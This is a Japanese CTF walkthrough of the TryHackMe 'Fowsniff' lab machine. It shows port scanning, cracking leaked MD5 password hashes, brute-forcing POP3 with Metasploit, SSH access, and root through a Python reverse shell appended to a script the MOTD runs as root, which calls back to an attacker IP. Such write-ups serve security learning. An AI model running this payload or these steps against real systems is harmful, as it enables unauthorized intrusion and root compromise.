0
0

Delete article

Deleted articles cannot be recovered.

Draft of this article would be also deleted.

Are you sure you want to delete this article?

概要

TryHackMe「Fowsniff CTF」のWalkthroughです。

Task1

Q2.Using nmap, scan this machine. What ports are open?

Hint.nmap -A -p- -sV MACHINE_IP

ポートスキャンを実行します。

$ nmap -Pn -sC -sV -A -p- 10.10.63.67 -oN nmap_result
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-04 02:17 EDT
Nmap scan report for 10.10.63.67
Host is up (0.24s latency).
Not shown: 65531 closed tcp ports (conn-refused)
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 90:35:66:f4:c6:d2:95:12:1b:e8:cd:de:aa:4e:03:23 (RSA)
|   256 53:9d:23:67:34:cf:0a:d5:5a:9a:11:74:bd:fd:de:71 (ECDSA)
|_  256 a2:8f:db:ae:9e:3d:c9:e6:a9:ca:03:b1:d7:1b:66:83 (ED25519)
80/tcp  open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Fowsniff Corp - Delivering Solutions
| http-robots.txt: 1 disallowed entry 
|_/
110/tcp open  pop3    Dovecot pop3d
|_pop3-capabilities: SASL(PLAIN) RESP-CODES TOP AUTH-RESP-CODE CAPA UIDL PIPELINING USER
143/tcp open  imap    Dovecot imapd
|_imap-capabilities: SASL-IR more have IDLE post-login ENABLE listed capabilities Pre-login LITERAL+ OK ID IMAP4rev1 AUTH=PLAINA0001 LOGIN-REFERRALS
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

ポートの稼働状況が分かりました。

ポート サービス バージョン
22 ssh OpenSSH 7.2p2
80 http Apache httpd 2.4.18
110 pop3 Dovecot pop3d
134 imap Dovecot imapd

Q3.Using the information from the open ports. Look around. What can you find?

80番ポートからWebページにアクセスできました。

home page.png

また、ページの本文から「Fowsniff社がサイバー攻撃を受け、従業員情報などが流出したこと」、「会社のTwitterアカウント@fowsniffcorpが乗っ取られたこと」が分かりました。

page content.png

ディレクトリスキャンではめぼしいものは見つかりませんでした。

$ dirsearch -u http://10.10.63.67
[03:53:28] 301 -  311B  - /assets  ->  http://10.10.63.67/assets/
[03:53:28] 200 -  471B  - /assets/
[03:53:54] 301 -  311B  - /images  ->  http://10.10.63.67/images/
[03:53:54] 200 -  507B  - /images/
[03:54:00] 200 -    6KB - /LICENSE.txt
[03:54:22] 200 -  774B  - /README.txt
[03:54:24] 200 -   26B  - /robots.txt
[03:54:26] 200 -  228B  - /security.txt

Q4.Using Google, can you find any public information about them?

Hint.There is a pastebin with all of the company employees emails and hashes. If the pastebin is down, check out TheWayBackMachine, or https://github.com/berzerk0/Fowsniff

乗っ取られたTwitterアカウントを発見しました。

このアカウントの一番最初のツイートにPastebinのリンクがあります。

内容からパスワードダンプされた情報のバックアップリンクを発見しました。

リンクにアクセスするとパスワードのハッシュ値が得られました。
また、同リンクの文からMD5でハッシュ化されていると分かりました。

mauer@fowsniff:8a28a94a588a95b80163709ab4313aa4
mustikka@fowsniff:ae1644dac5b77c0cf51e0d26ad6d7e56
tegel@fowsniff:1dc352435fecca338acfd4be10984009
baksteen@fowsniff:19f5af754c31f1e2651edde9250d69bb
seina@fowsniff:90dc16d47114aa13671c697fd506cf26
stone@fowsniff:a92b8a29ef1183192e3d35187e0cfabd
mursten@fowsniff:0e9588cb62f4b6f27e33d449e2ba0b3b
parede@fowsniff:4d6e42f56e127803285a0a7649b5ab11
sciana@fowsniff:f7fd98d380735e859f8b2ffbbede5a7e

Q5.Can you decode these md5 hashes? You can even use sites like hashkiller to decode them.

ハッシュ値をすべて解析しパスワードを特定できました。

mauer@fowsniff:8a28a94a588a95b80163709ab4313aa4->mailcall
mustikka@fowsniff:ae1644dac5b77c0cf51e0d26ad6d7e56->bilbo101
tegel@fowsniff:1dc352435fecca338acfd4be10984009->apples01
baksteen@fowsniff:19f5af754c31f1e2651edde9250d69bb->skyler22
seina@fowsniff:90dc16d47114aa13671c697fd506cf26->scoobydoo2
stone@fowsniff:a92b8a29ef1183192e3d35187e0cfabd->不明
mursten@fowsniff:0e9588cb62f4b6f27e33d449e2ba0b3b->carp4ever
parede@fowsniff:4d6e42f56e127803285a0a7649b5ab11->orlando12
sciana@fowsniff:f7fd98d380735e859f8b2ffbbede5a7e->07011972

Q6.Using the usernames and passwords you captured, can you use metasploit to brute force the pop3 login?

Hint.In metasploit there is a packages called: auxiliary/scanner/pop3/pop3_login where you can enter all the usernames and passwords you found to brute force this machines pop3 service.

Metasploitのauxiliary/scanner/pop3/pop3_loginを使用して得られた認証情報でブルートフォース攻撃をします。

ユーザー名のリストファイルと、パスワードのリストファイルを作成します。

user.txt
mauer
mustikka
tegel
baksteen
seina
stone
mursten
parede
sciana
pass.txt
mailcall
bilbo101
apples01
skyler22
scoobydoo2
carp4ever
orlando12
07011972

オプションを設定しエクスプロイトを実行します。

metasploit options.png

Q7.What was seina's password to the email service?

seinaアカウントのパスワードがわかりました。

[+] 10.10.63.67:110       - 10.10.63.67:110 - Success: 'seina:scoobydoo2' '+OK Logged in.  '

A.scoobydoo2

Q8.Can you connect to the pop3 service with her credentials? What email information can you gather?

Hint.Use netcat with the port 110 to view her emails. nc 110

Netcatで110ポートに接続します。

$ nc 10.10.63.67 110
+OK Welcome to the Fowsniff Corporate Mail Server!
user seina
+OK
pass scoobydoo2
+OK Logged in.

二つのメールを発見しました。

Return-Path: <stone@fowsniff>
X-Original-To: seina@fowsniff
Delivered-To: seina@fowsniff
Received: by fowsniff (Postfix, from userid 1000)
        id 0FA3916A; Tue, 13 Mar 2018 14:51:07 -0400 (EDT)
To: baksteen@fowsniff, mauer@fowsniff, mursten@fowsniff,
    mustikka@fowsniff, parede@fowsniff, sciana@fowsniff, seina@fowsniff,
    tegel@fowsniff
Subject: URGENT! Security EVENT!
Message-Id: <20180313185107.0FA3916A@fowsniff>
Date: Tue, 13 Mar 2018 14:51:07 -0400 (EDT)
From: stone@fowsniff (stone)

Dear All,

A few days ago, a malicious actor was able to gain entry to
our internal email systems. The attacker was able to exploit
incorrectly filtered escape characters within our SQL database
to access our login credentials. Both the SQL and authentication
system used legacy methods that had not been updated in some time.

We have been instructed to perform a complete internal system
overhaul. While the main systems are "in the shop," we have
moved to this isolated, temporary server that has minimal
functionality.

This server is capable of sending and receiving emails, but only
locally. That means you can only send emails to other users, not
to the world wide web. You can, however, access this system via 
the SSH protocol.

The temporary password for SSH is "S1ck3nBluff+secureshell"

You MUST change this password as soon as possible, and you will do so under my
guidance. I saw the leak the attacker posted online, and I must say that your
passwords were not very secure.

Come see me in my office at your earliest convenience and we'll set it up.

Thanks,
A.J Stone
Return-Path: <baksteen@fowsniff>
X-Original-To: seina@fowsniff
Delivered-To: seina@fowsniff
Received: by fowsniff (Postfix, from userid 1004)
        id 101CA1AC2; Tue, 13 Mar 2018 14:54:05 -0400 (EDT)
To: seina@fowsniff
Subject: You missed out!
Message-Id: <20180313185405.101CA1AC2@fowsniff>
Date: Tue, 13 Mar 2018 14:54:05 -0400 (EDT)
From: baksteen@fowsniff

Devin,

You should have seen the brass lay into AJ today!
We are going to be talking about this one for a looooong time hahaha.
Who knew the regional manager had been in the navy? She was swearing like a sailor!

I don't know what kind of pneumonia or something you brought back with
you from your camping trip, but I think I'm coming down with it myself.
How long have you been gone - a week?
Next time you're going to get sick and miss the managerial blowout of the century,
at least keep it to yourself!

I'm going to head home early and eat some chicken soup. 
I think I just got an email from Stone, too, but it's probably just some
"Let me explain the tone of my meeting with management" face-saving mail.
I'll read it when I get back.

Feel better,

Skyler

PS: Make sure you change your email password. 
AJ had been telling us to do that right before Captain Profanity showed up.

Q9.Looking through her emails, what was a temporary password set for her?

メールのメッセージから設定されたSSHのパスワードはS1ck3nBluff+secureshellだと分かりました。

A.S1ck3nBluff+secureshell

Q10.In the email, who send it? Using the password from the previous question and the senders username, connect to the machine using SSH.

メールを送信してきたbaksteenのアカウントでSSH接続に成功しました。

$ ssh baksteen@10.10.63.67
baksteen@10.10.63.67's password:
baksteen@fowsniff:~$ 

Q11.Once connected, what groups does this user belong to? Are there any interesting files that can be run by that group?

Hint.cube.sh

baksteenusersグループに所属していると分かりました。

$ id
uid=1004(baksteen) gid=100(users) groups=100(users),1001(baksteen)

groupでファイルを検索すると/opt/cube/cube.shを発見しました。

$ find / -group users -type f 2>/dev/null
/opt/cube/cube.sh

Q12.Now you have found a file that can be edited by the group, can you edit it to include a reverse shell?

Hint.Use a python reverse shell (make sure it runs as python3)

/opt/cube/cube.shファイルはusersグループに全権限があると分かりました。

$ ls -l /opt/cube/cube.sh 
-rw-rwxr-- 1 parede users 851 Mar 11  2018 /opt/cube/cube.sh

cube.shを確認するとSSH接続時のバナーだと分かりました。

/opt/cube/cube.sh
printf "
                            _____                       _  __  __  
      :sdddddddddddddddy+  |  ___|____      _____ _ __ (_)/ _|/ _|  
   :yNMMMMMMMMMMMMMNmhsso  | |_ / _ \ \ /\ / / __| '_ \| | |_| |_   
.sdmmmmmNmmmmmmmNdyssssso  |  _| (_) \ V  V /\__ \ | | | |  _|  _|  
-:      y.      dssssssso  |_|  \___/ \_/\_/ |___/_| |_|_|_| |_|   
-:      y.      dssssssso                ____                      
-:      y.      dssssssso               / ___|___  _ __ _ __        
-:      y.      dssssssso              | |   / _ \| '__| '_ \     
-:      o.      dssssssso              | |__| (_) | |  | |_) |  _  
-:      o.      yssssssso               \____\___/|_|  | .__/  (_) 
-:    .+mdddddddmyyyyyhy:                              |_|        
-: -odMMMMMMMMMMmhhdy/.    
.ohdddddddddddddho:                  Delivering Solutions\n\n"

このファイルにpythonのリバースシェルコードを追加します。

printf "
                            _____                       _  __  __  
      :sdddddddddddddddy+  |  ___|____      _____ _ __ (_)/ _|/ _|  
   :yNMMMMMMMMMMMMMNmhsso  | |_ / _ \ \ /\ / / __| '_ \| | |_| |_   
.sdmmmmmNmmmmmmmNdyssssso  |  _| (_) \ V  V /\__ \ | | | |  _|  _|  
-:      y.      dssssssso  |_|  \___/ \_/\_/ |___/_| |_|_|_| |_|   
-:      y.      dssssssso                ____                      
-:      y.      dssssssso               / ___|___  _ __ _ __        
-:      y.      dssssssso              | |   / _ \| '__| '_ \     
-:      o.      dssssssso              | |__| (_) | |  | |_) |  _  
-:      o.      yssssssso               \____\___/|_|  | .__/  (_) 
-:    .+mdddddddmyyyyyhy:                              |_|        
-: -odMMMMMMMMMMmhhdy/.    
.ohdddddddddddddho:                  Delivering Solutions\n\n"

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.6.55.144",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'

Q13If you have not found out already, this file is run as root when a user connects to the machine using SSH. We know this as when we first connect we can see we get given a banner (with fowsniff corp). Look in /etc/update-motd.d/ file. If (after we have put our reverse shell in the cube file) we then include this file in the motd.d file, it will run as root and we will get a reverse shell as root!.

Hint.Run the cube file to the motd.d file.

/etc/update-motd.d/00-headerを確認するとroot権限で/opt/cube/cube.shが実行されていると分かります。

$ ls -l /etc/update-motd.d/00-header 
-rwxr-xr-x 1 root root 1248 Mar 11  2018 /etc/update-motd.d/00-header
$ cat /etc/update-motd.d/00-header 
#!/bin/sh
#
#    00-header - create the header of the MOTD
#    Copyright (C) 2009-2010 Canonical Ltd.
#
#    Authors: Dustin Kirkland <kirkland@canonical.com>
#
#    This program is free software; you can redistribute it and/or modify
#    it under the terms of the GNU General Public License as published by
#    the Free Software Foundation; either version 2 of the License, or
#    (at your option) any later version.
#
#    This program is distributed in the hope that it will be useful,
#    but WITHOUT ANY WARRANTY; without even the implied warranty of
#    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#    GNU General Public License for more details.
#
#    You should have received a copy of the GNU General Public License along
#    with this program; if not, write to the Free Software Foundation, Inc.,
#    51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.

#[ -r /etc/lsb-release ] && . /etc/lsb-release

#if [ -z "$DISTRIB_DESCRIPTION" ] && [ -x /usr/bin/lsb_release ]; then
#       # Fall back to using the very slow lsb_release utility
#       DISTRIB_DESCRIPTION=$(lsb_release -s -d)
#fi

#printf "Welcome to %s (%s %s %s)\n" "$DISTRIB_DESCRIPTION" "$(uname -o)" "$(uname -r)" "$(uname -m)"

sh /opt/cube/cube.sh

Q14.Start a netcat listener (nc -lvp 1234) and then re-login to the SSH service. You will then receive a reverse shell on your netcat session as root!

Netcatでリッスンします。

$ nc -lvnp 1234

SSHで再度ログインするとrootのシェルを取得できました。

$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.6.55.144] from (UNKNOWN) [10.10.63.67] 45222
# whoami
whoami
root

/root/flag.txtからルートフラグを取得できました。

/root/flag.txt
   ___                        _        _      _   _             _ 
  / __|___ _ _  __ _ _ _ __ _| |_ _  _| |__ _| |_(_)___ _ _  __| |
 | (__/ _ \ ' \/ _` | '_/ _` |  _| || | / _` |  _| / _ \ ' \(_-<_|
  \___\___/_||_\__, |_| \__,_|\__|\_,_|_\__,_|\__|_\___/_||_/__(_)
               |___/ 

 (_)
  |--------------
  |&&&&&&&&&&&&&&|
  |    R O O T   |
  |    F L A G   |
  |&&&&&&&&&&&&&&|
  |--------------
  |
  |
  |
  |
  |
  |
 ---

Nice work!

This CTF was built with love in every byte by @berzerk0 on Twitter.

Special thanks to psf, @nbulischeck and the whole Fofao Team.
0
0
0

Register as a new user and use Qiita more conveniently

  1. You get articles that match your needs
  2. You can efficiently read back useful information
  3. You can use dark theme
What you can do with signing up
0
0

Delete article

Deleted articles cannot be recovered.

Draft of this article would be also deleted.

Are you sure you want to delete this article?